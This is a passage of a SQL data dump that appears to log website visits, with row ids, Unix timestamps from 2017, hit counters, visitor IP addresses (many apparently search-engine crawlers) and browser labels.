.69.133.203','other'),(105286,1493602264,1,1,0,0,'95.108.213.34','other'),(105287,1493602267,1,1,0,0,'141.8.142.154','other'),(105288,1493602326,1,1,0,0,'5.255.253.43','other'),(105289,1493602420,1,1,0,0,'51.255.71.118','other'),(105290,1493602889,1,1,0,0,'164.132.161.67','other'),(105291,1493603515,1,1,0,0,'8.29.198.25','other'),(105292,1493603679,1,1,0,0,'137.74.203.194','other'),(105293,1493603951,1,1,0,0,'217.182.132.54','other'),(105294,1493604138,1,1,0,0,'51.255.71.122','other'),(105295,1493604262,1,1,0,0,'217.182.132.171','other'),(105296,1493604585,1,1,0,0,'37.204.154.238','msie'),(105297,1493604598,1,1,0,0,'51.255.65.96','other'),(105298,1493604762,1,1,0,0,'176.195.123.122','msie'),(105299,1493604911,1,1,0,0,'37.9.113.43','other'),(105300,1493605553,1,1,0,0,'141.8.183.1','other'),(105301,1493605743,1,1,0,0,'164.132.161.12','other'),(105302,1493606148,1,1,0,0,'164.132.161.74','other'),(105303,1493607050,1,1,0,0,'164.132.161.31','other'),(105304,1493607908,1,1,0,0,'217.182.132.184','other'),(105305,1493608343,1,1,0,0,'217.182.132.182','other'),(105306,1493608562,1,1,0,0,'217.182.132.95','other'),(105307,1493608805,1,1,0,0,'51.255.65.58','other'),(105308,1493609148,1,1,0,0,'216.145.5.42','firefox'),(105309,1493610580,1,1,0,0,'217.69.133.15','other'),(105310,1493610697,1,1,0,0,'51.255.65.82','other'),(105311,1493610769,1,0,1,0,'66.249.76.27',''),(105312,1493611089,1,1,0,0,'217.182.132.91','other'),(105313,1493611717,1,1,0,0,'51.255.65.69','other'),(105314,1493611897,1,1,0,0,'217.182.132.187','other'),(105315,1493612729,1,1,0,0,'217.182.132.171','other'),(105316,1493613130,1,1,0,0,'51.255.65.32','other'),(105317,1493613179,1,1,0,0,'51.255.65.61','other'),(105318,1493613267,1,1,0,0,'51.255.65.31','other'),(105319,1493614336,1,1,0,0,'8.29.198.27','other'),(105320,1493614502,1,1,0,0,'216.244.66.237','other'),(105321,1493614621,1,1,0,0,'164.132.161.81','other'),(105322,1493614790,1,0,1,0,'66.249.76.108',''),(105323,1493614952,1,1,0,0,'217.69.133.241','other'),(105324,1493615368,1,1,0,0,'164.132.162.155','other'),(105325,1493615841,1,1,0,0,'51.255.65.66','other'),(105326,1493615978,1,1,0,0,'164.132.161.74','other'),(105327,1493616219,1,1,0,0,'51.255.71.127','other'),(105328,1493616268,1,1,0,0,'188.32.70.155','msie'),(105329,1493616838,1,1,0,0,'217.182.132.156','other'),(105330,1493617195,1,1,0,0,'217.182.132.191','other'),(105331,1493617304,1,1,0,0,'66.102.9.29','chrome'),(105332,1493617330,1,1,0,0,'109.63.199.164','msie'),(105333,1493617534,1,1,0,0,'51.255.71.101','other'),(105334,1493617642,1,0,1,0,'66.249.66.22',''),(105335,1493618144,1,1,0,0,'51.255.65.94','other'),(105336,1493618305,1,1,0,0,'51.255.65.72','other'),(105337,1493618549,1,1,0,0,'217.182.132.175','other'),(105338,1493618559,2,0,2,0,'66.249.76.108',''),(105339,1493618693,1,1,0,0,'51.255.65.224','other'),(105340,1493618774,1,0,1,0,'66.249.76.29',''),(105341,1493618791,1,1,0,0,'95.221.209.38','msie'),(105342,1493619296,2,2,0,0,'199.58.86.211','other'),(105343,1493619322,1,1,0,0,'176.195.103.51','msie'),(105344,1493619749,1,1,0,0,'51.255.65.65','other'),(105345,1493620068,1,1,0,0,'128.69.148.63','msie'),(105346,1493620152,1,1,0,0,'137.74.207.109','other'),(105347,1493620656,1,1,0,0,'217.69.133.244','other'),(105348,1493620865,1,1,0,0,'217.182.132.61','other'),(105349,1493620959,1,1,0,0,'66.249.66.25','chrome'),(105350,1493621043,1,1,0,0,'164.132.161.26','other'),(105351,1493621119,1,1,0,0,'66.249.76.109','chrome'),(105352,1493621248,1,1,0,0,'217.182.132.37','other'),(105353,1493621709,1,1,0,0,'217.182.132.23','other'),(105354,1493622472,1,1,0,0,'91.124.239.65','chrome'),(105355,1493622886,1,1,0,0,'217.182.132.96','other'),(105356,1493623156,1,0,1,0,'68.180.231.24',''),(105357,1493623445,1,1,0,0,'164.132.161.37','other'),(105358,1493623713,1,1,0,0,'92.113.156.105','chrome'),(105359,1493624057,1,1,0,0,'164.132.161.22','other'),(105360,1493624058,1,1,0,0,'51.255.65.52','other'),(105361,1493625037,1,1,0,0,'164.132.161.2','other'),(105362,1493625166,1,1,0,0,'8.29.198.27','other'),(105363,1493625205,1,1,0,0,'217.69.134.174','other'),(105364,1493626216,1,0,1,0,'66.249.76.27',''),(105365,1493626621,1,1,0,0,'193.194.127.217','firefox'),(105366,1493626710,1,1,0,0,'164.132.161.76','other'),(105367,1493626839,1,1,0,0,'164.132.161.81','other'),(105368,1493627631,1,1,0,0,'217.182.132.75','other'),(105369,1493628022,1,1,0,0,'217.182.132.14','other'),(105370,1493628483,1,1,0,0,'66.249.66.22','chrome'),(105371,1493628568,1,1,0,0,'217.69.134.178','other'),(105372,1493628928,1,1,0,0,'51.255.71.101','other'),(105373,1493628956,1,1,0,0,'217.182.132.54','other'),(105374,1493629435,1,1,0,0,'51.255.65.68','other'),(105375,1493629682,1,1,0,0,'217.182.132.53','other'),(105376,1493629857,1,1,0,0,'217.182.132.185','other'),(105377,1493629941,1,1,0,0,'217.182.132.148','other'),(105378,1493629973,1,1,0,0,'217.182.132.7','other'),(105379,1493630011,1,1,0,0,'164.132.162.164','other'),(105380,1493630360,1,1,0,0,'217.182.132.91','other'),(105381,1493630492,1,1,0,0,'217.182.132.65','other'),(105382,1493632032,1,1,0,0,'141.8.142.154','other'),(105383,1493632316,1,1,0,0,'178.154.189.22','other'),(105384,1493632381,1,1,0,0,'51.255.65.50','other'),(105385,1493632385,1,1,0,0,'217.182.132.73','other'),(105386,1493632457,1,1,0,0,'217.182.132.188','other'),(105387,1493632711,1,1,0,0,'51.255.65.15','other'),(105388,1493632954,1,1,0,0,'51.255.71.132','other'),(105389,1493633132,1,1,0,0,'217.182.132.68','other'),(105390,1493633184,1,0,1,0,'66.249.76.27',''),(105391,1493633408,2,2,0,0,'217.182.132.190','other'),(105392,1493633770,1,1,0,0,'141.0.12.25','other'),(105393,1493633967,1,1,0,0,'164.132.161.37','other'),(105394,1493634476,1,0,1,0,'66.249.76.29',''),(105395,1493634623,1,1,0,0,'51.255.65.50','other'),(105396,1493634680,1,1,0,0,'40.77.167.87','other'),(105397,1493634808,1,1,0,0,'91.196.178.39','chrome'),(105398,1493634892,1,1,0,0,'217.182.132.85','other'),(105399,1493634997,1,1,0,0,'51.255.65.58','other'),(105400,1493635265,1,1,0,0,'217.182.132.172','other'),(105401,1493635545,1,1,0,0,'141.8.142.164','other'),(105402,1493635556,1,1,0,0,'95.108.213.34','other'),(105403,1493635995,1,1,0,0,'8.29.198.25','other'),(105404,1493636026,1,1,0,0,'164.132.161.13','other'),(105405,1493636897,1,1,0,0,'217.182.132.177','other'),(105406,1493636934,1,1,0,0,'217.182.132.90','other'),(105407,1493637285,1,1,0,0,'40.77.167.17','other'),(105408,1493637650,1,1,0,0,'217.182.132.179','other'),(105409,1493637787,1,1,0,0,'164.132.161.75','other'),(105410,1493638017,1,1,0,0,'217.182.132.150','other'),(105411,1493638372,1,1,0,0,'164.132.161.9','other'),(105412,1493638579,1,1,0,0,'164.132.161.88','other'),(105413,1493639042,1,1,0,0,'164.132.161.45','other'),(105414,1493639289,1,1,0,0,'180.76.15.137','other'),(105415,1493639315,1,1,0,0,'51.255.65.39','other'),(105416,1493639611,1,0,1,0,'66.249.76.108',''),(105417,1493640476,1,1,0,0,'91.196.178.40','firefox'),(105418,1493640856,1,1,0,0,'164.132.161.43','other'),(105419,1493640935,1,0,1,0,'66.249.76.27',''),(105420,1493641333,1,1,0,0,'164.132.161.55','other'),(105421,1493641341,1,1,0,0,'137.74.207.170','other'),(105422,1493641406,1,1,0,0,'95.108.213.34','other'),(105423,1493641428,2,2,0,0,'40.77.167.17','other'),(105424,1493641531,1,1,0,0,'51.255.71.110','other'),(105425,1493641982,1,1,0,0,'164.132.161.33','other'),(105426,1493642121,2,2,0,0,'66.249.83.142','chrome'),(105427,1493642140,1,1,0,0,'66.249.83.144','chrome'),(105428,1493642237,1,1,0,0,'51.255.65.16','other'),(105429,1493642311,1,0,1,0,'66.249.66.81',''),(105430,1493642344,2,0,2,0,'66.249.76.28',''),(105431,1493642603,1,1,0,0,'217.182.132.35','other'),(105432,1493643599,1,1,0,0,'180.76.15.144','other'),(105433,1493644048,1,1,0,0,'217.182.132.28','other'),(105434,1493644110,1,1,0,0,'141.8.142.15','other'),(105435,1493644290,1,1,0,0,'164.132.161.17','other'),(105436,1493645151,1,1,0,0,'51.255.65.72','other'),(105437,1493645374,1,1,0,0,'217.182.132.80','other'),(105438,1493645779,1,1,0,0,'95.108.213.34','other'),(105439,1493646619,1,1,0,0,'40.77.167.17','other'),(105440,1493646724,1,1,0,0,'164.132.161.18','other'),(105441,1493646824,1,1,0,0,'8.29.198.25','other'),(105442,1493646893,1,1,0,0,'51.255.65.86','other'),(105443,1493647424,1,1,0,0,'66.249.93.156','chrome'),(105444,1493648404,1,1,0,0,'188.32.70.155','msie'),(105445,1493648406,1,1,0,0,'51.255.65.81','other'),(105446,1493649259,1,1,0,0,'109.63.199.164','msie'),(105447,1493649290,1,1,0,0,'217.182.132.91','other'),(105448,1493649597,1,1,0,0,'5.255.253.63','other'),(105449,1493649665,1,0,1,0,'66.249.76.29',''),(105450,1493649694,1,1,0,0,'176.105.206.72','chrome'),(105451,1493649704,1,1,0,0,'51.255.65.95','other'),(105452,1493649742,1,0,1,0,'66.249.76.27',''),(105453,1493649789,1,1,0,0,'178.154.200.37','other'),(105454,1493649802,1,1,0,0,'217.182.132.80','other'),(105455,1493650156,1,1,0,0,'164.132.161.41','other'),(105456,1493650439,1,1,0,0,'217.182.132.31','other'),(105457,1493650595,1,1,0,0,'164.132.161.82','other'),(105458,1493650695,1,1,0,0,'164.132.162.154','other'),(105459,1493650902,1,1,0,0,'91.196.178.167','chrome'),(105460,1493650946,1,1,0,0,'176.195.123.122','msie'),(105461,1493651128,1,1,0,0,'164.132.161.22','other'),(105462,1493651451,1,1,0,0,'95.221.209.38','msie'),(105463,1493651463,1,1,0,0,'217.182.132.37','other'),(105464,1493651613,1,1,0,0,'164.132.161.12','other'),(105465,1493651681,4,0,4,0,'66.249.76.28',''),(105466,1493651758,1,0,1,0,'66.249.76.27',''),(105467,1493652016,1,1,0,0,'217.182.132.32','other'),(105468,1493652658,1,1,0,0,'217.182.132.149','other'),(105469,1493653139,1,1,0,0,'217.182.132.52','other'),(105470,1493653369,1,1,0,0,'82.145.221.93','other'),(105471,1493653951,1,1,0,0,'180.76.15.13','other'),(105472,1493654587,1,1,0,0,'66.249.76.108','chrome'),(105473,1493654889,1,1,0,0,'37.73.226.198','chrome'),(105474,1493654916,1,1,0,0,'157.55.39.207','other'),(105475,1493655744,1,0,1,0,'66.249.76.107',''),(105476,1493656197,1,1,0,0,'217.182.132.72','other'),(105477,1493657524,1,1,0,0,'164.132.161.15','other'),(105478,1493657626,1,1,0,0,'217.182.132.20','other'),(105479,1493657675,1,1,0,0,'8.29.198.26','other'),(105480,1493657709,1,1,0,0,'46.147.221.130','msie'),(105481,1493657848,1,1,0,0,'217.182.132.6','other'),(105482,1493657852,1,1,0,0,'51.255.65.22','other'),(105483,1493657908,1,1,0,0,'164.132.161.27','other'),(105484,1493658037,1,1,0,0,'51.255.71.112','other'),(105485,1493658095,1,1,0,0,'176.195.116.45','msie'),(105486,1493658202,1,1,0,0,'217.182.132.173','other'),(105487,1493658527,5,5,0,0,'5.9.144.195','other'),(105488,1493658751,1,1,0,0,'51.255.65.2','other'),(105489,1493658842,1,1,0,0,'164.132.161.37','other'),(105490,1493658852,1,0,1,0,'66.249.76.28',''),(105491,1493659292,1,0,1,0,'66.249.66.84',''),(105492,1493659390,1,1,0,0,'51.255.71.127','other'),(105493,1493659522,1,1,0,0,'217.182.132.57','other'),(105494,1493659672,1,1,0,0,'51.255.65.19','other'),(105495,1493659744,1,1,0,0,'109.63.199.164','msie'),(105496,1493659794,1,0,1,0,'66.249.76.29',''),(105497,1493660029,1,1,0,0,'92.113.126.210','chrome'),(105498,1493660115,1,1,0,0,'164.132.161.88','other'),(105499,1493660335,1,1,0,0,'217.182.132.60','other'),(105500,1493660536,1,1,0,0,'176.195.123.122','msie'),(105501,1493660644,2,2,0,0,'94.45.101.58','other'),(105502,1493660982,1,1,0,0,'95.24.25.5','msie'),(105503,1493661224,1,1,0,0,'164.132.161.56','other'),(105504,1493661436,1,1,0,0,'216.244.66.237','other'),(105505,1493661670,1,1,0,0,'66.102.9.38','chrome'),(105506,1493661689,1,1,0,0,'217.182.132.62','other'),(105507,1493661789,1,1,0,0,'164.132.164.180','other'),(105508,1493662095,1,0,1,0,'66.249.66.87',''),(105509,1493662446,1,0,1,0,'66.249.76.108',''),(105510,1493662687,2,0,2,0,'66.249.76.28',''),(105511,1493663276,1,1,0,0,'51.255.71.129','other'),(105512,1493664157,1,1,0,0,'51.255.65.71','other'),(105513,1493665127,1,1,0,0,'95.108.213.34','other'),(105514,1493665298,1,1,0,0,'164.132.161.71','other'),(105515,1493665413,1,1,0,0,'164.132.161.3','other'),(105516,1493665472,1,1,0,0,'178.137.83.166','chrome'),(105517,1493665883,1,1,0,0,'51.255.65.38','other'),(105518,1493666643,1,1,0,0,'217.182.132.32','other'),(105519,1493666911,1,1,0,0,'51.255.65.93','other'),(105520,1493667179,1,1,0,0,'51.255.65.73','other'),(105521,1493667509,1,1,0,0,'164.132.161.56','other'),(105522,1493668510,1,1,0,0,'8.29.198.26','other'),(105523,1493668693,1,1,0,0,'51.255.65.89','other'),(105524,1493668846,1,0,1,0,'66.249.76.107',''),(105525,1493668936,1,0,1,0,'66.249.66.81',''),(105526,1493669485,1,1,0,0,'151.80.27.116','other'),(105527,1493670206,1,1,0,0,'128.69.148.63','msie'),(105528,1493670810,1,1,0,0,'164.132.161.81','other'),(105529,1493670811,1,1,0,0,'164.132.161.75','other'),(105530,1493670812,1,1,0,0,'91.196.178.167','chrome'),(105531,1493670993,1,1,0,0,'216.244.66.237','other'),(105532,1493671578,1,1,0,0,'51.255.65.69','other'),(105533,1493671758,1,1,0,0,'137.74.207.101','other'),(105534,1493672069,1,1,0,0,'51.255.71.130','other'),(105535,1493672098,1,1,0,0,'217.182.132.91','other'),(105536,1493672109,1,1,0,0,'217.182.132.72','other'),(105537,1493672118,1,1,0,0,'46.4.88.247','other'),(105538,1493672582,1,1,0,0,'51.255.71.98','other'),(105539,1493672965,1,1,0,0,'217.182.132.176','other'),(105540,1493673955,1,1,0,0,'66.249.76.107','chrome'),(105541,1493674123,1,0,1,0,'66.249.66.81',''),(105542,1493674201,1,1,0,0,'188.32.70.155','msie'),(105543,1493675191,1,1,0,0,'91.196.178.167','chrome'),(105544,1493675208,1,1,0,0,'217.182.132.73','other'),(105545,1493676175,1,1,0,0,'217.182.132.35','other'),(105546,1493676189,1,1,0,0,'37.204.152.138','msie'),(105547,1493676417,1,1,0,0,'164.132.161.5','other'),(105548,1493676462,1,1,0,0,'51.255.65.11','other'),(105549,1493676719,1,1,0,0,'164.132.161.29','other'),(105550,1493677116,2,2,0,0,'54.165.59.7','other'),(105551,1493677244,1,1,0,0,'51.255.65.42','other'),(105552,1493677390,1,1,0,0,'217.182.132.153','other'),(105553,1493677500,1,1,0,0,'217.182.132.82','other'),(105554,1493677559,1,1,0,0,'137.74.201.99','other'),(105555,1493677786,1,1,0,0,'216.244.66.237','other'),(105556,1493678078,1,1,0,0,'176.195.106.164','msie'),(105557,1493678254,1,1,0,0,'40.77.167.45','other'),(105558,1493678309,1,1,0,0,'137.74.207.170','other'),(105559,1493678484,1,1,0,0,'95.221.251.112','msie'),(105560,1493678629,1,1,0,0,'217.182.132.6','other'),(105561,1493678646,1,1,0,0,'54.165.59.7','other'),(105562,1493678940,1,1,0,0,'51.255.71.133','other'),(105563,1493679080,2,0,2,0,'66.249.76.27',''),(105564,1493679201,1,1,0,0,'217.182.132.60','other'),(105565,1493679346,1,1,0,0,'8.29.198.27','other'),(105566,1493679643,1,0,1,0,'66.249.66.87',''),(105567,1493679932,1,1,0,0,'51.255.65.61','other'),(105568,1493679988,1,1,0,0,'164.132.161.23','other'),(105569,1493680822,1,1,0,0,'66.249.66.87','chrome'),(105570,1493680847,1,1,0,0,'137.74.207.108','other'),(105571,1493681420,1,1,0,0,'217.182.132.68','other'),(105572,1493681570,1,0,1,0,'66.249.76.28',''),(105573,1493682477,1,0,1,0,'66.249.76.27',''),(105574,1493682648,1,1,0,0,'164.132.164.180','other'),(105575,1493682966,1,1,0,0,'188.32.176.246','msie'),(105576,1493683151,1,0,1,0,'66.249.76.29',''),(105577,1493683322,1,1,0,0,'40.77.167.87','other'),(105578,1493683379,1,1,0,0,'51.255.65.54','other'),(105579,1493683671,1,1,0,0,'217.182.132.6','other'),(105580,1493683761,1,1,0,0,'54.165.59.7','other'),(105581,1493683862,1,1,0,0,'216.244.66.237','other'),(105582,1493683974,1,1,0,0,'137.74.207.110','other'),(105583,1493684116,1,0,1,0,'66.249.76.29',''),(105584,1493684400,1,1,0,0,'51.255.71.116','other'),(105585,1493684623,9,9,0,0,'118.193.203.205','other'),(105586,1493685566,1,0,1,0,'66.249.76.109',''),(105587,1493685976,1,1,0,0,'51.255.65.49','other'),(105588,1493685995,1,0,1,0,'66.249.76.27',''),(105589,1493686045,1,0,1,0,'66.249.76.28',''),(105590,1493686220,1,1,0,0,'51.255.65.24','other'),(105591,1493687019,1,1,0,0,'51.255.65.84','other'),(105592,1493687056,1,1,0,0,'217.182.132.71','other'),(105593,1493688187,1,1,0,0,'176.195.115.138','msie'),(105594,1493688351,2,0,2,0,'66.249.76.107',''),(105595,1493688626,1,0,1,0,'66.249.66.28',''),(105596,1493688676,1,0,1,0,'66.249.66.25',''),(105597,1493688738,1,1,0,0,'217.182.132.24','other'),(105598,1493688739,1,0,1,0,'66.249.76.109',''),(105599,1493689124,1,1,0,0,'216.244.66.237','other'),(105600,1493689365,3,0,3,0,'66.249.76.107',''),(105601,1493689756,1,1,0,0,'109.63.177.234','msie'),(105602,1493690180,1,1,0,0,'8.29.198.26','other'),(105603,1493690370,1,1,0,0,'217.182.132.27','other'),(105604,1493690619,2,0,2,0,'66.249.66.28',''),(105605,1493690690,1,1,0,0,'40.77.167.87','other'),(105606,1493690769,1,0,1,0,'66.249.66.22',''),(105607,1493690994,2,0,2,0,'66.249.76.107',''),(105608,1493691014,1,1,0,0,'176.195.106.164','msie'),(105609,1493691027,1,0,1,0,'68.180.231.24',''),(105610,1493691157,1,1,0,0,'51.255.65.224','other'),(105611,1493691541,1,1,0,0,'51.255.71.129','other'),(105612,1493692146,1,1,0,0,'51.255.65.72','other'),(105613,1493692924,2,0,2,0,'66.249.76.27',''),(105614,1493692953,1,1,0,0,'51.255.65.53','other'),(105615,1493693597,1,1,0,0,'164.132.164.180','other'),(105616,1493694061,1,1,0,0,'51.255.65.90','other'),(105617,1493695160,1,0,1,0,'66.249.76.27',''),(105618,1493695211,1,1,0,0,'217.182.132.56','other'),(105619,1493695394,1,1,0,0,'128.69.148.63','msie'),(105620,1493695582,1,1,0,0,'51.255.71.116','other'),(105621,1493695818,1,1,0,0,'66.249.76.29','chrome'),(105622,1493696270,1,1,0,0,'40.77.167.45','other'),(105623,1493696400,1,1,0,0,'180.76.15.21','other'),(105624,1493696748,2,0,2,0,'66.249.76.29',''),(105625,1493696771,1,0,1,0,'66.249.66.22',''),(105626,1493697427,1,1,0,0,'164.132.161.80','other'),(105627,1493697541,1,1,0,0,'217.69.133.215','other'),(105628,1493698150,1,1,0,0,'217.182.132.5','other'),(105629,1493698737,1,1,0,0,'164.132.161.25','other'),(105630,1493699630,1,1,0,0,'188.32.70.155','msie'),(105631,1493699705,1,1,0,0,'5.165.252.200','msie'),(105632,1493699798,1,1,0,0,'216.244.66.237','other'),(105633,1493700076,1,0,1,0,'66.249.76.108',''),(105634,1493700644,1,1,0,0,'164.132.161.59','other'),(105635,1493700995,1,1,0,0,'178.92.73.214','chrome'),(105636,1493701020,1,1,0,0,'8.29.198.25','other'),(105637,1493701129,1,1,0,0,'46.242.65.100','msie'),(105638,1493701206,1,0,1,0,'66.249.76.108',''),(105639,1493701343,1,1,0,0,'164.132.161.28','other'),(105640,1493701901,1,1,0,0,'178.92.73.214','chrome'),(105641,1493701933,1,1,0,0,'164.132.161.47','other'),(105642,1493701986,1,1,0,0,'217.182.132.148','other'),(105643,1493702111,1,1,0,0,'178.255.215.94','other'),(105644,1493702450,1,1,0,0,'89.19.7.58','firefox'),(105645,1493703156,1,1,0,0,'164.132.161.77','other'),(105646,1493703226,1,1,0,0,'217.69.133.218','other'),(105647,1493703370,1,1,0,0,'164.132.161.27','other'),(105648,1493703579,1,1,0,0,'164.132.161.63','other'),(105649,1493703707,1,1,0,0,'95.24.25.5','msie'),(105650,1493704238,1,0,1,0,'66.249.76.27',''),(105651,1493704379,1,1,0,0,'217.69.133.191','other'),(105652,1493704737,1,1,0,0,'51.255.65.43','other'),(105653,1493704988,1,0,1,0,'68.180.228.49',''),(105654,1493705052,1,0,1,0,'66.249.76.107',''),(105655,1493705240,1,0,1,0,'66.249.66.28',''),(105656,1493705378,1,1,0,0,'217.182.132.28','other'),(105657,1493705489,1,1,0,0,'164.132.161.68','other'),(105658,1493706145,1,0,1,0,'68.180.228.49',''),(105659,1493706874,1,1,0,0,'217.69.133.12','other'),(105660,1493707018,1,1,0,0,'51.255.65.49','other'),(105661,1493707383,1,0,1,0,'66.249.76.107',''),(105662,1493707420,2,0,2,0,'66.249.76.108',''),(105663,1493707426,1,1,0,0,'137.74.207.120','other'),(105664,1493707657,1,1,0,0,'217.182.132.186','other'),(105665,1493708130,1,1,0,0,'5.167.115.153','msie'),(105666,1493708139,1,1,0,0,'188.32.70.155','msie'),(105667,1493708205,1,1,0,0,'51.255.71.132','other'),(105668,1493708313,1,1,0,0,'217.182.132.192','other'),(105669,1493708357,1,1,0,0,'164.132.161.2','other'),(105670,1493708716,1,1,0,0,'164.132.162.155','other'),(105671,1493708779,1,1,0,0,'66.249.93.204','chrome'),(105672,1493709048,1,1,0,0,'51.255.65.37','other'),(105673,1493709075,1,1,0,0,'109.63.177.234','msie'),(105674,1493709225,2,0,2,0,'66.249.76.27',''),(105675,1493709275,1,0,1,0,'66.249.76.29',''),(105676,1493709688,1,0,1,0,'66.249.66.22',''),(105677,1493710048,1,1,0,0,'164.132.161.10','other'),(105678,1493710303,1,1,0,0,'217.182.132.240','other'),(105679,1493710352,1,1,0,0,'176.113.170.104','firefox'),(105680,1493710362,1,1,0,0,'178.154.200.2','other'),(105681,1493710377,1,1,0,0,'164.132.161.89','other'),(105682,1493710411,1,1,0,0,'164.132.161.57','other'),(105683,1493710430,1,1,0,0,'164.132.162.188','other'),(105684,1493710431,1,1,0,0,'141.8.132.25','other'),(105685,1493710831,1,1,0,0,'217.182.132.185','other'),(105686,1493711198,1,1,0,0,'95.24.25.5','msie'),(105687,1493711522,1,1,0,0,'164.132.161.66','other'),(105688,1493711666,1,1,0,0,'46.242.65.100','msie'),(105689,1493711783,1,1,0,0,'164.132.161.15','other'),(105690,1493711853,1,1,0,0,'8.29.198.27','other'),(105691,1493712053,2,2,0,0,'51.255.65.66','other'),(105692,1493712644,2,0,2,0,'66.249.76.28',''),(105693,1493712835,1,1,0,0,'164.132.161.6','other'),(105694,1493712865,1,1,0,0,'91.196.178.67','firefox'),(105695,1493712953,1,1,0,0,'95.108.213.8','other'),(105696,1493713234,1,1,0,0,'51.255.71.128','other'),(105697,1493713269,1,1,0,0,'164.132.161.34','other'),(105698,1493713687,1,1,0,0,'83.149.126.98','other'),(105699,1493714338,1,0,1,0,'66.249.66.22',''),(105700,1493714640,1,1,0,0,'164.132.161.93','other'),(105701,1493714685,1,1,0,0,'51.255.65.10','other'),(105702,1493714987,1,1,0,0,'66.249.93.157','chrome'),(105703,1493715145,1,1,0,0,'164.132.161.67','other'),(105704,1493715270,1,1,0,0,'66.249.66.22','chrome'),(105705,1493715372,1,1,0,0,'217.182.132.72','other'),(105706,1493716523,1,1,0,0,'217.182.132.16','other'),(105707,1493716643,1,1,0,0,'164.132.161.75','other'),(105708,1493716899,1,1,0,0,'137.74.207.188','other'),(105709,1493718635,1,1,0,0,'217.182.132.4','other'),(105710,1493719071,1,1,0,0,'217.182.132.93','other'),(105711,1493719640,1,1,0,0,'137.74.207.170','other'),(105712,1493719768,1,1,0,0,'164.132.161.60','other'),(105713,1493719984,1,1,0,0,'164.132.161.36','other'),(105714,1493720043,1,1,0,0,'51.255.65.82','other'),(105715,1493720266,1,1,0,0,'164.132.161.92','other'),(105716,1493720365,1,1,0,0,'217.182.132.75','other'),(105717,1493722187,1,1,0,0,'51.255.71.114','other'),(105718,1493722351,1,1,0,0,'217.182.132.36','other'),(105719,1493722679,1,1,0,0,'8.29.198.26','other'),(105720,1493723203,1,1,0,0,'178.92.8.25','chrome'),(105721,1493724225,1,1,0,0,'217.182.132.192','other'),(105722,1493724769,1,1,0,0,'95.221.203.38','chrome'),(105723,1493724875,1,0,1,0,'66.249.76.28',''),(105724,1493724888,1,0,1,0,'66.249.66.22',''),(105725,1493726175,1,1,0,0,'51.255.71.125','other'),(105726,1493726497,1,1,0,0,'217.182.132.155','other'),(105727,1493726556,1,1,0,0,'217.182.132.33','other'),(105728,1493727263,1,1,0,0,'195.43.70.252','firefox'),(105729,1493727412,1,0,1,0,'66.249.76.27',''),(105730,1493727461,1,1,0,0,'180.76.15.158','other'),(105731,1493727857,1,1,0,0,'51.255.65.48','other'),(105732,1493727981,1,1,0,0,'40.77.167.37','other'),(105733,1493728090,1,1,0,0,'164.132.161.32','other'),(105734,1493728552,1,1,0,0,'137.74.207.164','other'),(105735,1493728744,1,1,0,0,'51.255.65.27','other'),(105736,1493728819,1,0,1,0,'66.249.76.107',''),(105737,1493729054,1,1,0,0,'217.182.132.64','other'),(105738,1493729295,1,1,0,0,'217.182.132.4','other'),(105739,1493730394,1,1,0,0,'137.74.207.159','other'),(105740,1493731001,1,1,0,0,'164.132.161.90','other'),(105741,1493731845,1,1,0,0,'51.255.65.97','other'),(105742,1493732086,1,1,0,0,'164.132.161.9','other'),(105743,1493732604,1,1,0,0,'95.108.213.34','other'),(105744,1493732610,1,1,0,0,'141.8.142.15','other'),(105745,1493732622,1,1,0,0,'164.132.161.62','other'),(105746,1493732822,1,0,1,0,'66.249.66.84',''),(105747,1493732862,2,0,2,0,'66.249.76.27',''),(105748,1493732889,1,1,0,0,'66.102.9.57','chrome'),(105749,1493733183,1,1,0,0,'51.255.65.52','other'),(105750,1493733267,1,0,1,0,'66.249.76.107',''),(105751,1493733507,1,1,0,0,'8.29.198.27','other'),(105752,1493733570,2,2,0,0,'54.165.59.7','other'),(105753,1493734109,1,1,0,0,'40.77.167.54','other'),(105754,1493734972,1,1,0,0,'164.132.161.73','other'),(105755,1493735239,1,1,0,0,'164.132.161.43','other'),(105756,1493735332,1,1,0,0,'77.123.50.34','chrome'),(105757,1493737463,1,1,0,0,'95.132.76.224','firefox'),(105758,1493737859,1,1,0,0,'164.132.161.6','other'),(105759,1493738504,1,1,0,0,'164.132.161.41','other'),(105760,1493738549,1,1,0,0,'164.132.161.20','other'),(105761,1493738664,1,1,0,0,'51.255.65.54','other'),(105762,1493739187,1,1,0,0,'51.255.71.111','other'),(105763,1493739747,1,1,0,0,'137.74.207.116','other'),(105764,1493739750,1,1,0,0,'66.249.76.109','chrome'),(105765,1493740043,1,1,0,0,'217.182.132.73','other'),(105766,1493740335,1,1,0,0,'164.132.162.187','other'),(105767,1493740902,1,0,1,0,'66.249.66.25',''),(105768,1493741065,1,1,0,0,'51.255.65.10','other'),(105769,1493741226,1,1,0,0,'164.132.161.72','other'),(105770,1493741478,1,0,1,0,'66.249.76.109',''),(105771,1493741596,1,0,1,0,'66.249.76.27',''),(105772,1493742630,2,0,2,0,'66.249.76.108',''),(105773,1493744195,1,1,0,0,'66.102.9.22','chrome'),(105774,1493744337,1,1,0,0,'8.29.198.27','other'),(105775,1493745195,1,1,0,0,'164.132.161.11','other'),(105776,1493745405,1,0,1,0,'66.249.76.29',''),(105777,1493745431,1,0,1,0,'66.249.66.81',''),(105778,1493746336,3,3,0,0,'92.222.146.105','other'),(105779,1493747112,1,1,0,0,'51.255.65.22','other'),(105780,1493747886,1,1,0,0,'91.196.178.70','other'),(105781,1493749336,1,1,0,0,'217.182.132.54','other'),(105782,1493749966,1,1,0,0,'217.182.132.20','other'),(105783,1493750244,1,1,0,0,'164.132.161.3','other'),(105784,1493750258,1,1,0,0,'164.132.161.87','other'),(105785,1493750432,1,1,0,0,'51.255.65.81','other'),(105786,1493751556,1,1,0,0,'164.132.161.21','other'),(105787,1493751644,1,1,0,0,'51.255.65.82','other'),(105788,1493752000,1,1,0,0,'95.10.25.69','other'),(105789,1493752105,1,1,0,0,'164.132.161.40','other'),(105790,1493752126,1,1,0,0,'81.213.186.108','other'),(105791,1493752300,1,1,0,0,'164.132.161.55','other'),(105792,1493752713,1,1,0,0,'217.182.132.191','other'),(105793,1493753203,1,0,1,0,'66.249.76.108',''),(105794,1493753353,1,1,0,0,'40.77.167.30','other'),(105795,1493753557,1,1,0,0,'137.74.207.101','other'),(105796,1493753676,1,1,0,0,'217.182.132.178','other'),(105797,1493753766,1,1,0,0,'51.255.65.34','other'),(105798,1493753797,1,1,0,0,'164.132.161.25','other'),(105799,1493753997,1,1,0,0,'217.182.132.175','other'),(105800,1493755161,1,1,0,0,'8.29.198.25','other'),(105801,1493756134,1,1,0,